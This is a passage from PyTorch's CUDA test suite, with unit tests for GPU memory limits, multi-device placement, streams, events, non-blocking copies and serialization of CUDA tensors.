gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
        # it will OOM when trying to allocate more than half of the memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
            # Pushes a 0.1 second spin onto the stream so that, if the copy is
            # non-blocking, the stream will almost surely still be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
            # Therefore, this test uses relative comparisons, checking if the
            # sum of the parent and child threads' execution times is greater than
            # the real execution time by at least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
            self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
        # This test detects unexpected block reallocation. For a reliable test,
        # the stream used to allocate tensors is isolated. The allocator will not
        # reuse free blocks that were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
